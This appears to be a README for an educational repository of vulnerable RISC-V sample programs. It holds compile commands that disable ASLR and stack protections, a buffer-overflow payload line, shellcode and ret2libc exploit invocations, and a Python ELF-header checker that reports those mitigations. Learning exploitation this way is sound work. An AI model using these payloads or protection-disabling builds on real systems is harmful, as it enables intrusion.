RISC-V exploitation

November 10, 2019

This repository is a small collection of vulnerable sample programs and exploits, tried out on the Fedora RISC-V image.

Buffer overflow:

Compile with:

$ gcc bufferoverflow.c -o bufferoverflow -Ttext=0x55555500

Exploit with:

$ ./bufferoverflow `python -c "print 'C'*8+'B'*8+'\xc0\x55\x55\x55'"`


Shellcode:

Compile with:

$ echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc vuln.c -z execstack -o vuln
$ ld execve.o -o execve -z execstack
$ objcopy -O binary --only-section=.text execve execve.text

Exploit with:

$ ./vuln `python attack.py`

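Both builds above deliberately switch protections off: a non-PIE link at a fixed address (-Ttext) and an executable stack (-z execstack). As an added example that is not part of this repository, the following Python reads the ELF64 headers of a binary and reports exactly those settings; the ELF constants are the standard ones, and make_sample_elf64 constructs a headers-only image so the check runs offline without the repository's binaries.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
EM_RISCV = 243
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X = 1

def analyze_elf64(data):
    """Report mitigation-relevant facts about a little-endian ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:  # 64-bit, LE
        raise ValueError("not a little-endian ELF64 file")
    (e_type, e_machine, _ver, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIQQQIHHH", data, 16)
    stack_exec, text_vaddr = True, None  # no PT_GNU_STACK => executable stack
    for i in range(e_phnum):
        p_type, p_flags, _off, p_vaddr = struct.unpack_from(
            "<IIQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_exec = bool(p_flags & PF_X)   # this is what -z execstack sets
        elif p_type == PT_LOAD and p_flags & PF_X and text_vaddr is None:
            text_vaddr = p_vaddr                 # where -Ttext placed the code
    low4 = struct.pack("<Q", text_vaddr or 0)[:4]
    return {
        "riscv": e_machine == EM_RISCV,
        "pie": e_type == ET_DYN,          # only a PIE benefits from ASLR
        "nx_stack": not stack_exec,
        "text_vaddr": text_vaddr,
        # Addresses within 256 bytes of the .text base share its bytes 1-3; if
        # those are NUL-free (0x55555500 -> 55 55 55) a strcpy-style overflow
        # carries such an address intact, which is why the page links there.
        "text_window_nul_free": b"\x00" not in low4[1:4],
    }

def make_sample_elf64(e_type, text_vaddr, stack_flags):
    """Constructed minimal ELF64/RISC-V image (headers only) for testing."""
    ehdr = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, EM_RISCV, 1, text_vaddr,
                        64, 0, 0, 64, 56, 2, 0, 0, 0)
    load = struct.pack("<IIQQQQQQ", PT_LOAD, 5, 0, text_vaddr, text_vaddr,
                       0x1000, 0x1000, 0x1000)         # PF_R | PF_X
    stack = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + load + stack

if __name__ == "__main__":
    # A non-PIE binary linked at 0x55555500 with -z execstack, as built above.
    print(analyze_elf64(make_sample_elf64(ET_EXEC, 0x55555500, 7)))
```

To check one of the repository's own binaries, pass its bytes instead: `analyze_elf64(open("bufferoverflow", "rb").read())`.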

Ret2libc:

Compile with:

$ gcc vulnerable.c -o vulnerable

Exploit with:

$ ./r.sh ./vulnerable ./exploit

(You can download the script r.sh from https://github.com/hellman/fixenv.)

License

MIT